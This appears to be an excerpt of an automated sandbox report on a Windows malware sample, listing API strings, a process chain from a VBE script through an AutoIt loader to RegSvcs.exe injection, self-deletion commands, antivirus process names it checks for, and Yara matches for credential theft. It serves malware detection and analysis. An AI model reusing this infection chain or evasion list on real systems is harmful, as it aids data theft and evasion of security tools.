              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitforinputidlememstr_b0ca4596-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowvisiblememstr_d0a923f6-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dialogboxparamwmemstr_cf9a7ac5-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialogmemstr_e74b6eb6-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog*memstr_70666469-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextwmemstr_e5c0c08a-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextwsmemstr_6b400803-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: senddlgitemmessagewmemstr_790f16a8-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfocusmemstr_720fab3c-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindowmemstr_a26c4d9f-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow{memstr_ac531865-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsyscolormemstr_bd063308-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadbitmapwmemstr_4d8b12c2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadiconwmemstr_baee6e70-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroyiconmemstr_e9c15836-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagewmemstr_a0182f4e-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatiblebitmapmemstr_0d444114-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatibledcmemstr_609cf52d-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledcmemstr_1dd6db28-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletedcmemstr_53243165-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deleteobjectmemstr_4bdecb63-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapsmemstr_29eae7e9-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapswmemstr_ad1bf018-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: selectobjectmemstr_009cd005-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchbltmemstr_b15bced3-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createdibsectionmemstr_4f33e72f-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchblt5createdibsectionmemstr_85561036-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getobjectwmemstr_8f422ba4-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getopenfilenamewmemstr_21840137-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsavefilenamewmemstr_598951f4-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: commdlgextendederrormemstr_26731a7f-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: openprocesstokenmemstr_1945c8f5-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: adjusttokenprivilegesmemstr_07011933-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfilesecuritywmemstr_1955e18b-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lookupprivilegevaluewmemstr_524d0d7a-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: allocateandinitializesidmemstr_4634b96b-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lookupprivilegevaluew allocateandinitializesid memstr_d04fdbf6-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: freesidmemstr_6158f1aa-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: checktokenmembershipmemstr_1cefc10a-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: freesidqchecktokenmembershipzmemstr_cdbc0498-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gettokeninformationmemstr_858b3e5f-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copysidmemstr_a5e087b8-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gettokeninformationvcopysidwmemstr_95630719-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: initializesecuritydescriptormemstr_6d6ab5b0-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setsecuritydescriptordaclmemstr_091bef71-2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059BB02 SendInput,keybd_event,8_2_0059BB02
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059EBE5 mouse_event,8_2_0059EBE5
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\wnrs.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /releaseJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc oxhvi.msc bvqmcwxut.docxJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renewJump to behavior
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005913F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_005913F2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00591EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00591EF3
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006AAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000000.1525893636.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp, oxhvi.msc, 00000008.00000003.1543300339.0000000000F8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1939938542.000000000191D000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938671200.0000000001912000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657788132.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657811765.0000000000F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: oxhvi.msc, explorer.exe, 00000011.00000002.2639211861.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2628883555.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
              Source: oxhvi.msc, 00000008.00000003.1655595000.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
              Source: explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2629645027.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
              Source: oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then@
              Source: explorer.exe, 00000011.00000000.1635832502.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000011.00000002.2629645027.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: oxhvi.msc.exe, 0000001B.00000002.1942146299.0000000001898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then;
              Source: explorer.exe, 00000011.00000002.2639211861.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.1639216371.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2284256993.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q

              Language, Device and Operating System Detection

              Source: Yara match | File source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\qbmt\bvqmcwxut.docx, type: DROPPED
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX0\bvqmcwxut.docx, type: DROPPED
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A46694 cpuid 0_2_00A46694
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00A3FD34
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A4454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00A4454A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0058E5F8 GetUserNameW,8_2_0058E5F8
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc | Code function: 8_2_0056BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_0056BCF2
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exe | Code function: 0_2_00A303BE GetVersionExW,0_2_00A303BE
              Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658647659.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660524267.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807629194.0000000000D53000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1811336617.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdagent.exe
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658647659.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660524267.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938584375.0000000001991000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658647659.0000000000F64000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000002.1660524267.0000000000F65000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656577841.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656756561.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807629194.0000000000D53000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000002.1811336617.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVGUI.exe
              Source: oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938810056.000000000197E000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938611568.0000000001976000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
              Source: oxhvi.msc.exe, 00000016.00000002.1811275128.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1809809341.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807328415.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938721846.0000000001979000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000002.1942689431.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1940675061.0000000001985000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938394774.0000000001968000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: regshot.exe

              Stealing of Sensitive Information

              Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
